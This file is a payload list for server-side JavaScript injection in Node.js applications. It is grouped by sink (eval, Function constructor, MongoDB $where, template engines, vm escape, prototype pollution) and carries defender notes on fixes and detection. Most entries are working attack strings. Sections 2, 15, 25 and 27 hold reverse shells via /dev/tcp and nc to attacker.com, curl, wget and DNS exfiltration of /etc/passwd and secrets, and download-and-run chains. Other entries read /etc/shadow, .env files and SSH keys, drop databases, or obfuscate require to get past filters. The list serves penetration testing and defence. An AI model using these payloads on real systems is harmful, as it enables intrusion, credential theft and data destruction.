# Server-Side JavaScript Injection (SSJI) Payloads
#
# Layout: one entry per line, grouped by the server-side sink the entry exercises.
# Lines starting with "# " are comments. Entries starting with "#{" (Pug sections)
# are payload lines, not comments.
# Lines marked "Defender note" state the fix or the detection signal for that group.
# "attacker.com" and port 4444 are stand-ins for a tester-controlled host and port.

# ============================================
# 1. BASIC eval() INJECTION
# ============================================
# Defender note: every entry here needs request data to reach eval(). The fix is
# to remove the eval (JSON.parse for data, a fixed expression grammar for
# formulas). Input filtering does not make eval safe (see section 24).
# ESLint rule: no-eval.
# Simple expressions
2+2
Math.random()
Date.now()
JSON.stringify({})
# Information disclosure
# Defender note: a response that echoes process.env exposes whatever secrets the
# service was started with. Rotate them after any confirmed evaluation.
process.version
process.platform
process.arch
process.pid
process.cwd()
process.env
global
this
# File system access
# Defender note: reads succeed only with the privileges of the Node process.
# An unprivileged service account and a read-only, minimal container filesystem
# limit what these return.
require('fs').readFileSync('/etc/passwd', 'utf8')
require('fs').readFileSync('/etc/shadow', 'utf8')
require('fs').readFileSync('/proc/self/environ', 'utf8')
require('fs').readdirSync('/').toString()
require('fs').readdirSync('/home').toString()
require('fs').readFileSync('package.json', 'utf8')
require('fs').readFileSync('.env', 'utf8')

# ============================================
# 2. REMOTE CODE EXECUTION (RCE)
# ============================================
# Defender note: detection signal is the application's node process spawning
# sh/bash/nc/curl/wget children. Alert on child processes of the service and
# on outbound connections it does not normally make.
# Basic command execution
require('child_process').execSync('whoami').toString()
require('child_process').execSync('id').toString()
require('child_process').execSync('pwd').toString()
require('child_process').execSync('ls -la').toString()
require('child_process').execSync('cat /etc/passwd').toString()
require('child_process').execSync('uname -a').toString()
# Reverse shell
# Defender note: default-deny egress from application hosts stops the callback
# even when evaluation succeeds.
require('child_process').exec('bash -i >& /dev/tcp/attacker.com/4444 0>&1')
require('child_process').exec('nc -e /bin/bash attacker.com 4444')
require('child_process').spawn('nc', ['-e', '/bin/bash', 'attacker.com', '4444'])
# Data exfiltration
require('child_process').execSync('curl attacker.com/?data=$(cat /etc/passwd|base64)').toString()
require('child_process').execSync('wget --post-file=/etc/passwd attacker.com').toString()
# Write backdoor
# Defender note: file-integrity monitoring on the application directory and /tmp,
# plus a read-only root filesystem, covers these.
require('fs').writeFileSync('/tmp/backdoor.js', 'malicious code')
require('fs').writeFileSync('shell.php', '')

# ============================================
# 3. FUNCTION CONSTRUCTOR INJECTION
# ============================================
# Defender note: new Function(string) compiles its argument like eval and needs
# the same fix. ESLint rule: no-new-func.
# Basic Function constructor
new Function('return 2+2')()
new Function('return process.version')()
new Function('return require("os").userInfo()')()
# RCE via Function constructor
new Function('return require("child_process").execSync("whoami").toString()')()
new Function('return global.process.mainModule.require("child_process").execSync("id").toString()')()

# ============================================
# 4. MONGODB $where INJECTION
# ============================================
# Defender note: the sink is request data concatenated into a $where string.
# Use typed query operators instead of $where, and disable server-side
# JavaScript where it is not needed (security.javascriptEnabled: false, or
# mongod --noscripting).
# Basic MongoDB injection
admin' || '1'=='1
' || true || '
' || '1'=='1' || '
'; return true; //
admin'; return true; //
# MongoDB data exfiltration
# Defender note: these turn the query into a true/false oracle on field contents.
# Many near-identical queries differing by one character are the log signature.
'; return this.password.match(/^a/); //
'; return this.email.includes("admin"); //
'; return this.role == "admin"; //
# MongoDB enumeration
'; var users = db.users.find(); return true; //
'; db.users.find().forEach(function(u){print(u)}); return true; //
# MongoDB command execution (if possible)
# NOTE(review): MongoDB's server-side JavaScript is not a Node.js runtime.
# Whether require exists there depends on the target, so confirm before
# treating these as valid test cases.
'; require('child_process').execSync('whoami'); return true; //
'; var fs = require('fs'); fs.readFileSync('/etc/passwd'); return true; //
# MongoDB DoS
# Defender note: a query time limit (maxTimeMS) bounds the busy-loop case. The
# drop entries are destructive and do not belong in a production test run.
'; while(true){}; //
'; db.users.drop(); return true; //
'; db.dropDatabase(); return true; //

# ============================================
# 5. TEMPLATE INJECTION (HANDLEBARS)
# ============================================
# Defender note: relevant only when request data is compiled as the template
# source. Data passed as context to a fixed template is not affected. Keep
# Handlebars current and leave allowProtoPropertiesByDefault and
# allowProtoMethodsByDefault disabled.
# Handlebars RCE
{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').execSync('whoami');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}
# Simplified Handlebars payload
{{this}}
{{this.constructor}}
{{this.constructor.constructor}}

# ============================================
# 6. EJS TEMPLATE INJECTION
# ============================================
# Defender note: these apply when the EJS source string comes from the request.
# In a fixed template, <%= %> HTML-escapes its value and does not evaluate it.
<%= global.process.mainModule.require('child_process').execSync('whoami') %>
<%= require('child_process').execSync('cat /etc/passwd').toString() %>
<%= global.process.mainModule.require('fs').readFileSync('/etc/passwd', 'utf8') %>
<%= process.env %>
<%= JSON.stringify(process.env) %>

# ============================================
# 7. PUG/JADE TEMPLATE INJECTION
# ============================================
# Defender note: same precondition as EJS, an attacker-controlled template source.
# The "#{...}" lines below are entries, not comments.
#{global.process.mainModule.require('child_process').execSync('id')}
#{function(){return require('child_process').execSync('whoami')}()}
#{require('child_process').execSync('cat /etc/passwd').toString()}
- var x = global.process.mainModule.require('child_process').execSync('ls').toString()
= x

# ============================================
# 8. VM SANDBOX ESCAPE
# ============================================
# Defender note: the Node.js documentation states that the vm module is not a
# security mechanism. Untrusted code needs an OS-level boundary (separate
# process, container, or isolate with no host objects passed in).
# Constructor chain escape
this.constructor.constructor('return process')()
this.constructor.constructor('return global')()
({}).constructor.constructor('return this')()
# Process access
this.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString()
(function(){return this.constructor.constructor('return process')()})()
({}).constructor.constructor('return global.process.mainModule.require("child_process").execSync("id").toString()')()
# Alternative escapes
(function(){return this})().constructor.constructor('return process')()
arguments.callee.caller.constructor('return process')()

# ============================================
# 9. PROTOTYPE POLLUTION TO RCE
# ============================================
# Defender note: the sink is a recursive merge/clone/set-by-path over untrusted
# JSON. Reject the keys __proto__, constructor and prototype. Use
# Object.create(null) or Map for dictionaries, and consider
# Object.freeze(Object.prototype) or node --disable-proto=delete.
# Prototype pollution
{"__proto__": {"isAdmin": true}}
{"__proto__": {"polluted": "yes"}}
{"constructor": {"prototype": {"isAdmin": true}}}
# Pollution leading to RCE
# NOTE(review): these set toString/valueOf to a string value. On their own that
# makes later calls to those methods throw, which is an availability impact.
# Code execution additionally depends on application code that evaluates a
# polluted property, so triage the impact per application.
{"__proto__": {"toString": "require('child_process').execSync('whoami').toString()"}}
{"__proto__": {"valueOf": "require('child_process').execSync('id')"}}

# ============================================
# 10. SETTIMEOUT/SETINTERVAL INJECTION
# ============================================
# NOTE(review): the heading refers to setTimeout/setInterval called with a string
# argument, which browsers evaluate like eval. Node.js timers are expected to
# reject non-function callbacks, so confirm against the target runtime.
# ESLint rule: no-implied-eval.
require('child_process').exec('curl attacker.com/?data=$(whoami)')
require('fs').writeFileSync('/tmp/pwned', 'hacked')
require('child_process').execSync('nc attacker.com 4444 -e /bin/bash')
global.process.exit(1)

# ============================================
# 11. REQUIRE VARIATIONS
# ============================================
# Defender note: all of these reach the same module loader by different names,
# so blocking the literal text "require(" in input does not close the hole.
# Direct require
require('child_process')
require('fs')
require('net')
require('http')
# Global require
global.require('child_process')
global.process.mainModule.require('child_process')
# Module constructor
process.mainModule.constructor._load('child_process')
global.process.mainModule.constructor._load('fs')

# ============================================
# 12. ENVIRONMENT VARIABLE EXFILTRATION
# ============================================
# Defender note: prefer short-lived credentials fetched at use time over
# long-lived secrets in the environment. The variable names below are examples.
process.env
JSON.stringify(process.env)
process.env.PATH
process.env.HOME
process.env.USER
process.env.SECRET_KEY
process.env.DATABASE_URL
process.env.API_KEY

# ============================================
# 13. FILE READ VARIATIONS
# ============================================
# Defender note: same precondition and mitigations as "File system access" in
# section 1. Keep SSH keys and deployment credentials out of the service
# account's home directory.
# Read sensitive files
require('fs').readFileSync('/etc/passwd', 'utf8')
require('fs').readFileSync('/etc/shadow', 'utf8')
require('fs').readFileSync('/etc/hosts', 'utf8')
require('fs').readFileSync('/proc/self/environ', 'utf8')
require('fs').readFileSync('/home/user/.ssh/id_rsa', 'utf8')
require('fs').readFileSync('config/database.yml', 'utf8')
require('fs').readFileSync('.env', 'utf8')
require('fs').readFileSync('package.json', 'utf8')
# Directory listing
require('fs').readdirSync('/').toString()
require('fs').readdirSync('/etc').toString()
require('fs').readdirSync('/home').toString()
require('fs').readdirSync('.').toString()

# ============================================
# 14. COMMAND INJECTION VIA CHILD_PROCESS
# ============================================
# Defender note: same detection as section 2, namely process-creation telemetry
# for children of the node process.
# exec variations
require('child_process').exec('cat /etc/passwd', (e,o)=>console.log(o))
require('child_process').execSync('whoami').toString()
require('child_process').execFileSync('ls', ['-la']).toString()
# spawn variations
require('child_process').spawn('cat', ['/etc/passwd'])
require('child_process').spawnSync('id').stdout.toString()

# ============================================
# 15. NETWORK OPERATIONS
# ============================================
# Defender note: an egress allowlist plus DNS query logging covers all four.
# Long or high-entropy labels under a single parent domain are the
# DNS-exfiltration signal.
# HTTP request
require('http').get('http://attacker.com/?data=exfiltrated')
require('https').get('https://attacker.com/?data=' + process.env.SECRET)
# DNS exfiltration
require('dns').resolve4(process.env.SECRET + '.attacker.com')
# Socket connection
require('net').connect(4444, 'attacker.com')

# ============================================
# 16. PROCESS MANIPULATION
# ============================================
# Defender note: process.exit and process.kill terminate the server, which is an
# availability impact. Run under a supervisor that restarts the service and
# alert on unexpected exits.
process.exit(1)
process.kill(process.pid)
process.chdir('/')
process.binding('spawn_sync')

# ============================================
# 17. CRYPTO MODULE ACCESS
# ============================================
# Defender note: side-effect-free probes. A returned value shows that require
# works inside the evaluated context.
require('crypto').randomBytes(16).toString('hex')
require('crypto').getHashes()
require('crypto').getCiphers()

# ============================================
# 18. OS MODULE ACCESS
# ============================================
# Defender note: read-only host reconnaissance (user, hostname, interfaces).
# The output helps scope an incident because it shows what the process can see.
require('os').userInfo()
require('os').hostname()
require('os').platform()
require('os').arch()
require('os').cpus()
require('os').networkInterfaces()
require('os').tmpdir()
require('os').homedir()

# ============================================
# 19. PATH MODULE FOR TRAVERSAL
# ============================================
# Defender note: path.resolve and path.join only build a path string and read
# nothing. For file-serving code, resolve the final path and check that it
# stays under the intended base directory.
require('path').resolve('/etc/passwd')
require('path').join(__dirname, '../../../etc/passwd')

# ============================================
# 20. MONGODB SPECIFIC INJECTIONS
# ============================================
# Defender note: $function and mapReduce run only when server-side JavaScript is
# enabled (same setting as section 4). Never build pipeline stages from request
# JSON, and reject operator keys (leading "$") in user-supplied documents.
# $function aggregation (MongoDB 4.4+)
{$function: { body: function() { return require('child_process').execSync('whoami').toString(); }, args: [], lang: "js" }}
# mapReduce injection
{ map: function() { require('child_process').exec('curl attacker.com/?data=pwned'); emit(this._id, 1); }, reduce: function(k, v) { return Array.sum(v); } }

# ============================================
# 21. EXPRESS SPECIFIC
# ============================================
# Defender note: the three lines are the EJS, Pug and Handlebars output tags
# around user.input. Pass res.render an explicit object of named fields, never
# req.query or req.body wholesale, and never use request data as the template.
# res.render with unsafe data
<%= user.input %>
#{user.input}
{{user.input}}

# ============================================
# 22. WEBPACK/BUNDLER SPECIFIC
# ============================================
# Defender note: identifiers that bundled code exposes for module loading.
# __non_webpack_require__ is webpack's name for the native require.
__webpack_require__
__non_webpack_require__

# ============================================
# 23. ELECTRON SPECIFIC
# ============================================
# Defender note: renderer-side entries. nodeIntegration: false,
# contextIsolation: true and sandbox: true keep require out of web content.
# Validate the sender and the arguments of every ipcMain handler.
require('electron').remote.require('child_process')
require('electron').ipcRenderer.send('exploit')

# ============================================
# 24. OBFUSCATED PAYLOADS
# ============================================
# Defender note: these entries show why keyword denylists and WAF signatures for
# "require" or "child_process" are not a control. The module name is assembled
# only at run time. Fix the sink instead of filtering the text.
# String concatenation
req+'uire'('child_'+'process').exec('whoami')
# Unicode escaping
require('\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073')
# Hex encoding
require(Buffer.from('6368696c645f70726f63657373', 'hex').toString())
# Base64
require(Buffer.from('Y2hpbGRfcHJvY2Vzcw==', 'base64').toString())
# Computed property access
global['pro'+'cess'].mainModule['req'+'uire']('child_process')

# ============================================
# 25. NESTING AND CHAINING
# ============================================
# Defender note: download-then-execute and read-then-send chains. The egress
# and process-creation controls from sections 2 and 15 apply.
require('child_process').exec('wget http://attacker.com/shell.sh -O /tmp/s.sh && bash /tmp/s.sh')
require('child_process').execSync('curl attacker.com/$(cat /etc/passwd | base64)').toString()

# ============================================
# 26. TIME-BASED BLIND SSJI
# ============================================
# Defender note: used when nothing is echoed back, so the response delay is the
# only signal. Request timeouts and per-route latency alerts surface these.
require('child_process').execSync('sleep 5')
setTimeout(function(){}, 5000)
require('child_process').execSync('ping -c 5 attacker.com')

# ============================================
# 27. OUT-OF-BAND DATA EXFILTRATION
# ============================================
# Defender note: blocked by the same egress and DNS controls as section 15.
require('child_process').execSync('curl attacker.com -d "$(cat /etc/passwd)"')
require('child_process').execSync('wget --post-data="$(env)" attacker.com')
require('child_process').execSync('nslookup $(whoami).attacker.com')

# ============================================
# 28. WRITESTREAM FOR PERSISTENCE
# ============================================
# Defender note: same file-integrity and read-only-filesystem controls as
# "Write backdoor" in section 2.
require('fs').createWriteStream('/tmp/backdoor.js').write('malicious code')

# ============================================
# 29. REGEX DOS (ReDoS) via SSJI
# ============================================
# Defender note: nested and overlapping quantifiers backtrack exponentially on a
# non-matching input and block the event loop while they run. The same risk
# exists wherever request data becomes a RegExp pattern, even without eval.
/(a+)+b/.test('aaaaaaaaaaaaaaaaaaaaaa!')
/(a|a)*b/.test('aaaaaaaaaaaaaaaaaaaaaa!')

# ============================================
# 30. TESTING PAYLOADS
# ============================================
# Defender note: lowest-impact entries for confirming evaluation. The
# writeFileSync entry leaves /tmp/ssji_test_<timestamp> files behind, so remove
# them after the test.
# Detection payloads
throw new Error('SSJI Test')
console.log('SSJI_TEST_' + Date.now())
require('fs').writeFileSync('/tmp/ssji_test_' + Date.now(), 'test')
# Simple arithmetic to confirm execution
7*7
Math.sqrt(16)
[1,2,3].join(',')